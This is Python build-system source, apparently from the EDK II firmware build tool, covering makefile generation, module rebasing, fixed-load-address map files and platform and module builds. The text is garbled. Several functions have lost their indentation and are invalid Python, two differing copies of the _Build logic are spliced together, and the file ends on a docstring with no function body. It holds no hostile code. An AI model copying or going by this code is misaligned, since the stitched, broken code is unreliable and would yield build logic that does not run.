if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.UpdateBuildCache()
self.BuildModules = []
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
    ## Build a module or platform
    #
    # Create autogen code and makefile for a module or platform, and the launch
    # "make" command to build it
    #
    # @param Target The target of build command
    # @param AutoGenObject The AutoGen object of the platform/module
    # @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
    # @param CreateDepsCodeFile Flag used to indicate creating code
    # for dependent modules/Libraries
    # @param CreateDepsMakeFile Flag used to indicate creating makefile
    # for dependent modules/Libraries
    # @param BuildModule Run make directly instead of dispatching on a
    # named make target
    #
    def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
        # Nothing to build without a valid AutoGen object.
        if AutoGenObject is None:
            return False

        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            if not self.SkipAutoGen or Target == 'genc':
                self.Progress.Start("Generating code")
                AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
                self.Progress.Stop("done!")
            if Target == "genc":
                return True

            if not self.SkipAutoGen or Target == 'genmake':
                self.Progress.Start("Generating makefile")
                AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
                #AutoGenObject.CreateAsBuiltInf()
                self.Progress.Stop("done!")
            if Target == "genmake":
                return True
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(False)
            AutoGenObject.CreateMakeFile(False)

        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))

        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand is None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))

        # build modules
        if BuildModule:
            # 'fds' is handled by GenFdsApi below, so it is not passed to make.
            if Target != 'fds':
                BuildCommand = BuildCommand + [Target]
            AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            if GlobalData.gBinCacheDest:
                self.UpdateBuildCache()
            self.BuildModules = []
            return True

        # genfds
        if Target == 'fds':
            # GenFdsApi returns a truthy value on failure.
            if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
                EdkLogger.error("build", COMMAND_FAILURE)
            return True

        # run
        if Target == 'run':
            return True

        # build library
        if Target == 'libraries':
            pass

        # not build modules

        # cleanall
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            except WindowsError as X:
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
        return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
    ## Collect MAP information of all modules
    #
    def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
        """Classify every built .efi module by phase (PEI/BOOT/RUNTIME/SMM),
        patch the fixed-load-address PCDs into images that declare them, and
        rebase each group via _RebaseModule, appending the resulting address
        map to MapBuffer.

        @param MapBuffer   list of strings the map report is accumulated into
        @param ModuleList  {GUID: module AutoGen object} of all built modules
        """
        sys.stdout.write ("Generate Load Module At Fix Address Map")
        sys.stdout.flush()
        # Images whose patchable fix-address PCDs must be patched later.
        PatchEfiImageList = []
        # Per-phase {MetaFile: PeImageInfo} buckets and running size totals.
        PeiModuleList = {}
        BtModuleList = {}
        RtModuleList = {}
        SmmModuleList = {}
        PeiSize = 0
        BtSize = 0
        RtSize = 0
        # reserve 4K size in SMRAM to make SMM module address not from 0.
        SmmSize = 0x1000
        for ModuleGuid in ModuleList:
            Module = ModuleList[ModuleGuid]
            GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)

            OutputImageFile = ''
            for ResultFile in Module.CodaTargetList:
                if str(ResultFile.Target).endswith('.efi'):
                    #
                    # module list for PEI, DXE, RUNTIME and SMM
                    #
                    OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
                    ImageClass = PeImageClass (OutputImageFile)
                    if not ImageClass.IsValid:
                        EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
                    ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
                    if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
                        PeiModuleList[Module.MetaFile] = ImageInfo
                        PeiSize += ImageInfo.Image.Size
                    elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
                        BtModuleList[Module.MetaFile] = ImageInfo
                        BtSize += ImageInfo.Image.Size
                    elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
                        RtModuleList[Module.MetaFile] = ImageInfo
                        RtSize += ImageInfo.Image.Size
                    elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
                        SmmModuleList[Module.MetaFile] = ImageInfo
                        SmmSize += ImageInfo.Image.Size
                        if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                            PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
                            # for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
                            if int(PiSpecVersion, 16) < 0x0001000A:
                                BtModuleList[Module.MetaFile] = ImageInfo
                                BtSize += ImageInfo.Image.Size
                    break
            #
            # EFI image is final target.
            # Check EFI image contains patchable FixAddress related PCDs.
            #
            if OutputImageFile != '':
                ModuleIsPatch = False
                for Pcd in Module.ModulePcdList:
                    if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                        ModuleIsPatch = True
                        break
                if not ModuleIsPatch:
                    for Pcd in Module.LibraryPcdList:
                        if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
                            ModuleIsPatch = True
                            break

                if not ModuleIsPatch:
                    continue
                #
                # Module includes the patchable load fix address PCDs.
                # It will be fixed up later.
                #
                PatchEfiImageList.append (OutputImageFile)

        #
        # Get Top Memory address
        #
        # A LoadFixAddress of all-ones means "offset mode" (no absolute top).
        ReservedRuntimeMemorySize = 0
        TopMemoryAddress = 0
        if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
            TopMemoryAddress = 0
        else:
            TopMemoryAddress = self.LoadFixAddress
            if TopMemoryAddress < RtSize + BtSize + PeiSize:
                EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")

        #
        # Patch FixAddress related PCDs into EFI image
        #
        for EfiImage in PatchEfiImageList:
            EfiImageMap = EfiImage.replace('.efi', '.map')
            if not os.path.exists(EfiImageMap):
                continue
            #
            # Get PCD offset in EFI image by GenPatchPcdTable function
            #
            PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
            #
            # Patch real PCD value by PatchPcdValue tool
            #
            for PcdInfo in PcdTable:
                ReturnValue = 0
                if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
                elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
                    ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
                if ReturnValue != 0:
                    EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)

        # Page counts (4K pages) for each phase, then rebase each group.
        MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
        MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
        MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
        if len (SmmModuleList) > 0:
            MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))

        # Memory is allocated top-down: RUNTIME at the top, then BOOT, then PEI.
        PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
        BtBaseAddr = TopMemoryAddress - RtSize
        RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize

        # TopMemoryAddress == 0 means addresses are printed as offsets.
        self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
        self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
        MapBuffer.append('\n\n')
        sys.stdout.write ("\n")
        sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
    """Build the active platform once per (BuildTarget, ToolChain) pair.

    For each pair: create the workspace AutoGen, build every module of every
    arch via _BuildPa, then (for full/fds targets) emit the fixed-address
    MAP file.  Mutates self.Fdf / self.LoadFixAddress from the parsed DSC.
    """
    SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress
                    )
            # The DSC/workspace may override the FDF file and fix address.
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            self.BuildReport.AddPlatformReport(Wa)
            self.Progress.Stop("done!")
            # Add ffs build to makefile
            CmdListDict = {}
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd(Wa.ArchList)
            for Arch in Wa.ArchList:
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Get ModuleAutoGen object to generate C code file and makefile
                    Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                    if Ma is None:
                        continue
                    self.BuildModules.append(Ma)
                self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
            # Create MAP file when Load Fix Address is enabled.
            if self.Target in ["", "all", "fds"]:
                for Arch in Wa.ArchList:
                    GlobalData.gGlobalDefines['ARCH'] = Arch
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
                #
                # Get Module List: non-library modules keyed by upper-case GUID.
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma
                MapBuffer = []
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                if self.Fdf:
                    #
                    # create FDS again for the updated EFI image
                    #
                    self._Build("fds", Wa)
                    #
                    # Create MAP file for all platform FVs after GenFds.
                    #
                    self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
    """Build only self.ModuleFile for every (target, toolchain, arch) combination.

    Module build still requires the platform AutoGen first.  Returns True
    early for the pure code-generation targets 'genc'/'genmake'; raises via
    EdkLogger.error when the module is not part of the active platform or a
    build thread fails.
    """
    for BuildTarget in self.BuildTargetList:
        GlobalData.gGlobalDefines['TARGET'] = BuildTarget
        index = 0
        for ToolChain in self.ToolChainList:
            WorkspaceAutoGenTime = time.time()
            GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
            index += 1
            #
            # module build needs platform build information, so get platform
            # AutoGen first
            #
            Wa = WorkspaceAutoGen(
                    self.WorkspaceDir,
                    self.PlatformFile,
                    BuildTarget,
                    ToolChain,
                    self.ArchList,
                    self.BuildDatabase,
                    self.TargetTxt,
                    self.ToolDef,
                    self.Fdf,
                    self.FdList,
                    self.FvList,
                    self.CapList,
                    self.SkuId,
                    self.UniFlag,
                    self.Progress,
                    self.ModuleFile
                    )
            self.Fdf = Wa.FdfFile
            self.LoadFixAddress = Wa.Platform.LoadFixAddress
            Wa.CreateMakeFile(False)
            # Add ffs build to makefile
            CmdListDict = None
            if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
                CmdListDict = self._GenFfsCmd(Wa.ArchList)
            self.Progress.Stop("done!")
            MaList = []
            ExitFlag = threading.Event()
            ExitFlag.clear()
            self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
            for Arch in Wa.ArchList:
                AutoGenStart = time.time()
                GlobalData.gGlobalDefines['ARCH'] = Arch
                Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
                for Module in Pa.Platform.Modules:
                    # Match the requested module by directory and file name.
                    if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
                        Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
                        if Ma is None:
                            continue
                        MaList.append(Ma)
                        if Ma.CanSkipbyHash():
                            self.HashSkipModules.append(Ma)
                            if GlobalData.gBinCacheSource:
                                EdkLogger.quiet("cache hit: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
                            continue
                        else:
                            if GlobalData.gBinCacheSource:
                                EdkLogger.quiet("cache miss: %s[%s]" % (Ma.MetaFile.Path, Ma.Arch))
                        # Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
                        if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
                            # for target which must generate AutoGen code and makefile
                            if not self.SkipAutoGen or self.Target == 'genc':
                                self.Progress.Start("Generating code")
                                Ma.CreateCodeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genc":
                                return True
                            if not self.SkipAutoGen or self.Target == 'genmake':
                                self.Progress.Start("Generating makefile")
                                if CmdListDict and self.Fdf and (Module.File, Arch) in CmdListDict:
                                    Ma.CreateMakeFile(True, CmdListDict[Module.File, Arch])
                                    del CmdListDict[Module.File, Arch]
                                else:
                                    Ma.CreateMakeFile(True)
                                self.Progress.Stop("done!")
                            if self.Target == "genmake":
                                return True
                        self.BuildModules.append(Ma)
                        # Initialize all modules in tracking to 'FAIL'
                        if Ma.Arch not in GlobalData.gModuleBuildTracking:
                            GlobalData.gModuleBuildTracking[Ma.Arch] = dict()
                        if Ma not in GlobalData.gModuleBuildTracking[Ma.Arch]:
                            GlobalData.gModuleBuildTracking[Ma.Arch][Ma] = 'FAIL'
                self.AutoGenTime += int(round((time.time() - AutoGenStart)))
                MakeStart = time.time()
                for Ma in self.BuildModules:
                    if not Ma.IsBinaryModule:
                        Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
                    # Break build if any build thread has error
                    if BuildTask.HasError():
                        # we need a full version of makefile for platform
                        ExitFlag.set()
                        BuildTask.WaitForComplete()
                        self.invalidateHash()
                        Pa.CreateMakeFile(False)
                        EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                    # Start task scheduler
                    if not BuildTask.IsOnGoing():
                        BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
                # in case there's an interruption. we need a full version of makefile for platform
                Pa.CreateMakeFile(False)
                if BuildTask.HasError():
                    self.invalidateHash()
                    EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
                self.MakeTime += int(round((time.time() - MakeStart)))
            MakeContiue = time.time()
            ExitFlag.set()
            BuildTask.WaitForComplete()
            self.CreateAsBuiltInf()
            if GlobalData.gBinCacheDest:
                self.UpdateBuildCache()
            self.BuildModules = []
            self.MakeTime += int(round((time.time() - MakeContiue)))
            if BuildTask.HasError():
                self.invalidateHash()
                EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
            self.BuildReport.AddPlatformReport(Wa, MaList)
            if MaList == []:
                EdkLogger.error(
                            'build',
                            BUILD_ERROR,
                            "Module for [%s] is not a component of active platform."\
                            " Please make sure that the ARCH and inf file path are"\
                            " given in the same as in [%s]" % \
                                (', '.join(Wa.ArchList), self.PlatformFile),
                            ExtraData=self.ModuleFile
                            )
            # Create MAP file when Load Fix Address is enabled.
            if self.Target == "fds" and self.Fdf:
                for Arch in Wa.ArchList:
                    #
                    # Check whether the set fix address is above 4G for 32bit image.
                    #
                    if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
                        # NOTE(review): "platorm" typo below is in the shipped runtime message; left as-is in this doc-only pass.
                        EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
                #
                # Get Module List: non-library modules keyed by upper-case GUID.
                #
                ModuleList = {}
                for Pa in Wa.AutoGenObjectList:
                    for Ma in Pa.ModuleAutoGenList:
                        if Ma is None:
                            continue
                        if not Ma.IsLibrary:
                            ModuleList[Ma.Guid.upper()] = Ma
                MapBuffer = []
                if self.LoadFixAddress != 0:
                    #
                    # Rebase module to the preferred memory address before GenFds
                    #
                    self._CollectModuleMapBuffer(MapBuffer, ModuleList)
                #
                # create FDS again for the updated EFI image
                #
                GenFdsStart = time.time()
                self._Build("fds", Wa)
                self.GenFdsTime += int(round((time.time() - GenFdsStart)))
                #
                # Create MAP file for all platform FVs after GenFds.
                #
                self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
                #
                # Save MAP buffer into MAP file.
                #
                self._SaveMapFile (MapBuffer, Wa)
    self.invalidateHash()
def _GenFfsCmd(self,ArchList):
    """Invert GenFds' {Cmd: (Inf, Arch)} mapping into {(Inf, Arch): {Cmd, ...}}.

    Several FFS build commands can belong to the same (INF, arch) pair, so
    the values are accumulated into sets.
    """
